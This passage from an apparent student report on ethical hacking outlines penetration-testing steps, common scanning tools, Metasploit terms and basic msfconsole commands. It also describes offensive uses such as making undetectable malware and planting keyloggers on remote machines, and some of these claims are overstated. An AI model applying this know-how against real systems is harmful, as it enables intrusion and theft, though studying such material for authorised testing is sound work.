 Operating system, applications, database, networking equipments etc.
 Dynamic websites, in-house applications etc.
 Telephony (war-dialing, remote access etc.)
 Personnel (screening process, social engineering etc.)
 Physical (access controls, dumpster diving etc.)
 Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)

4. What is a process of penetration

testing?
Penetration testing has a vulnerability assessment part also. In pen test we
launch attack and in VA (vulnerability assessment) we only test for
vulnerability by automated VA tools like Nikto, nessus, acunetix etc.
Steps of advanced penetration testing:

Penetration Testing

Automated Manual
VA by Tools Using:
Metasploit
1. If we want to do pen test on any website like, www.anysite.com we need
DNS Records from robtex.com & whois records and other type of
information this part is known as Information Gathering.
2. After we use backtrack operating system (also known as pen-testing OS
for security experts) toolkit for auto pen-testing with help of free tools
like: Nikto, Privoxy, Nessus, Samurai etc.
3. Make report for all found vulnerabilities and cross verify.
4. Use commercial software’s like:
Core Impact, Canvas, Qualys Guard, Xcobra, NTOSpider, KSES,
AppScan, Webinspect, Brupsuite, Acunetix WVS etc.
5. Make report for new vulnerabilities.
6. After we will start manual pen-testing with help of Metasploit &
Reverse eng tools.
7. Find vulnerabilities and take screen shots for Proof-Of-Concept create
custom report.
8. Forward Custom Report to company.
 Metasploit 2013

1. What is Metasploit?
The Metasploit project is an open-source, computer security project which
provides information about security vulnerabilities and aids in penetration
testing and IDS signature development. Its most well-known sub-project is the
Metasploit framework, a tool for developing and executing exploit code
against a remote target machine. Other important sub projects include the op-
code Database, shell code archive, and security research. Metasploit is a best
hacking framework for local and remote hacking done in an easy way.

Metasploit Terms:

Exploit  to take advantage of a security flaw within a system, network, or

application.

Payload  is code that our victim computer to execute by the Metasploit

framework.

Module  a small piece of code that can be added to the Metasploit

framework to execute an attack.
Shell-code  a small piece of code used as a payload.

MSFconsole:

MSFconsole is an all-in-one interface to most of the features in Metasploit.

MSFconsole can be used to launch attacks, creating listeners, and much, much
more. Metasploit comes installed by default on backtrack 5. To access
MSFconsole, open your console and type:
 root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole
After sometime, the msfconsole will boot.

Or you can directly use “msfconsole command” to open Metasploit.

What we can do with Metasploit?

 We can hack all platforms of windows, linux, sun solaris, AXI etc
 We can hack any remote machine by the available exploits in adobe
acrobat 9.0.0.0, 8.1.1, Winamp, Realplayer, Oracle, Mozilla, IE, yahoo
messenger.
 We can create un-detectable VIRUS in exe, java, pdf, mp3 etc formats.
 We can sniff network traffic, and sessions for email passwords. SSL
protection and data protection.
  We can install key logger on remote machine, record audio etc

Msfconsole Commands:
1. Show Entering 'show' at the msfconsole prompt will display every
module within Metasploit. There are a number of 'show' commands
you can use but the ones you will use most frequently are 'show
auxiliary', 'show exploits', 'show payloads', 'show encoders'.

Show targets  For showing target in particular exploit.

Show options  Shows the various option of exploit

Show advanced  shows advance option of exploit.

Show payloads  It list all payloads.

Show exploits  It list all exploits.

Show auxiliary  it list all auxiliary.

2. Use  When you have decided on a particular module to make use

of, issue the 'use' command to select it. The 'use' command changes
your context to a specific module, exposing type-specific commands.
Notice in the output below that any global variables that were
previously set are already configured.
3. Set  The 'set' command allows you to configure Framework
options and parameters for the current module you are working
with.

4. unset  The opposite of the 'set' command, of course, is 'unset'.

'Unset' removes a parameter previously configured with 'set'. You
can remove all assigned variables with 'unset all'.

5. Back  Once you have finished working with a particular module,

or if you inadvertently select the wrong module, you can issue the
 'back' command to move out of the current context. This, however is
not required. Just as you can in commercial routers, you can switch
modules from within other modules. As a reminder, variables will
only carry over if they are set globally.

6. check There aren't many exploits that support it, but there is also
a 'check' option that will check to see if a target is vulnerable to a
particular exploit instead of actually exploiting it.

7. info  The 'info' command will provide detailed information about

a particular module including all options, targets, and other
 information. Be sure to always read the module description prior to
using it as some may have un-desired effects.
The info command also provides the following information:

The author and licensing information

Vulnerability references (ie: CVE, BID, etc)

Any payload restrictions the module may have

8. search The msfconsole includes an extensive regular-expression

based search functionality. If you have a general idea of what you
are looking for you can search for it via 'search '. In the output
below, a search is being made for MS Bulletin MS09-011. The search
function will locate this string within the module names,
descriptions, references, etc.
 9. sessions The 'sessions' command allows you to list, interact with,
and kill spawned sessions. The sessions can be shells, Meterpreter
sessions, VNC, etc.

Session –l  To list any active sessions

Session –i  To interact with a given session, you just need to use the '-i'
switch followed by the Id number of the session.
Reason for choosing CEH 2013

1. Companies started taking Information Security seriously.

2. Salary is good.
3. The field is diverse.
4. I will never be unemployed.
5. I have an opportunity to interact with everyone in the company.
6. I will set the rules (and also have the power to break them).
7. Being a security professional is cool… or at least people think it is.
Gantt chart 2013
 Bibliography 2013

 http://anti-virus-software-review.toptenreviews.com/